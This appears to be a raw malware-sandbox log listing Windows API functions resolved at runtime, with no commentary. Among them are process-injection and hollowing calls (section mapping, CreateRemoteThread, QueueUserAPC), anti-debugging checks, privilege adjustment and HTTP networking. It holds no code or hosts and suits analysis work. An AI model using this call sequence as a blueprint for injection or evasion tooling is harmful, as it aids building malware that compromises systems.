DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64ReadVirtualMemory64
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/RemoveDirectoryW
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/SetFilePointerEx
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/GetUserNameA
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: SHLWAPI.dll/StrToIntExA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrTrimA
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpQueryOption
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WS2_32.dll/GetAddrInfoW
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/FreeAddrInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: schannel.DLL/SpUserModeInitialize
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: secur32.dll/FreeContextBuffer
DynamicLoader: ncrypt.dll/SslOpenProvider
DynamicLoader: ncrypt.dll/GetSChannelInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/SslIncrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslImportKey
DynamicLoader: bcryptprimitives.dll/GetCipherInterface
DynamicLoader: ncrypt.dll/SslLookupCipherSuiteInfo
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ncrypt.dll/BCryptOpenAlgorithmProvider
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptGetProperty
DynamicLoader: ncrypt.dll/BCryptCreateHash
DynamicLoader: ncrypt.dll/BCryptHashData
DynamicLoader: ncrypt.dll/BCryptFinishHash
DynamicLoader: ncrypt.dll/BCryptDestroyHash
DynamicLoader: CRYPT32.dll/CertGetCertificateChain
DynamicLoader: USERENV.dll/GetUserProfileDirectoryW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: USERENV.dll/RegisterGPNotification
DynamicLoader: GPAPI.dll/RegisterGPNotificationInternal
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptSetHashParam
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureA
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigA
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeA
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingA
DynamicLoader: RPCRT4.dll/RpcEpResolveBinding
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeA
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpOpen
DynamicLoader: WINHTTP.dll/WinHttpSetTimeouts
DynamicLoader: WINHTTP.dll/WinHttpSetOption
DynamicLoader: WINHTTP.dll/WinHttpCrackUrl
DynamicLoader: WINHTTP.dll/WinHttpConnect
DynamicLoader: WINHTTP.dll/WinHttpOpenRequest
DynamicLoader: WINHTTP.dll/WinHttpGetDefaultProxyConfiguration
DynamicLoader: WINHTTP.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: cryptbase.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WINHTTP.dll/WinHttpGetProxyForUrl
DynamicLoader: WINHTTP.dll/WinHttpTimeFromSystemTime
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: WINHTTP.dll/WinHttpSendRequest
DynamicLoader: WINHTTP.dll/WinHttpReceiveResponse
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: SHLWAPI.dll/StrStrIW
DynamicLoader: WINHTTP.dll/WinHttpQueryDataAvailable
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: cryptnet.dll/I_CryptNetSetUrlCacheFlushInfo
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetAsymmetricEncryptionInterface
DynamicLoader: ncrypt.dll/BCryptImportKeyPair
DynamicLoader: ncrypt.dll/BCryptVerifySignature
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: ncrypt.dll/BCryptDestroyKey
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: WINHTTP.dll/WinHttpSetStatusCallback
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: setupapi.dll/SetupIterateCabinetW
DynamicLoader: Cabinet.dll/
DynamicLoader: Cabinet.dll/
DynamicLoader: DEVRTL.dll/DevRtlGetThreadLogToken
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: Cabinet.dll/
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptGetObjectUrl
DynamicLoader: cryptnet.dll/CryptRetrieveObjectByUrlW
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: bcryptprimitives.dll/GetHashInterface
DynamicLoader: cryptnet.dll/I_CryptNetGetConnectivity
DynamicLoader: CRYPT32.dll/CertVerifyCertificateChainPolicy
DynamicLoader: CRYPT32.dll/CertFreeCertificateChain
DynamicLoader: CRYPT32.dll/CertDuplicateCertificateContext
DynamicLoader: ncrypt.dll/SslEncryptPacket
DynamicLoader: ncrypt.dll/SslDecryptPacket
DynamicLoader: WINHTTP.dll/WinHttpQueryHeaders
DynamicLoader: WINHTTP.dll/WinHttpReadData
DynamicLoader: ole32.dll/CreateStreamOnHGlobal
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: CRYPT32.dll/CertFreeCertificateContext
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: USER32.dll/GetShellWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: ntdll.dll/RtlExitUserThread
DynamicLoader: kernel32.dll/CreateRemoteThread
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
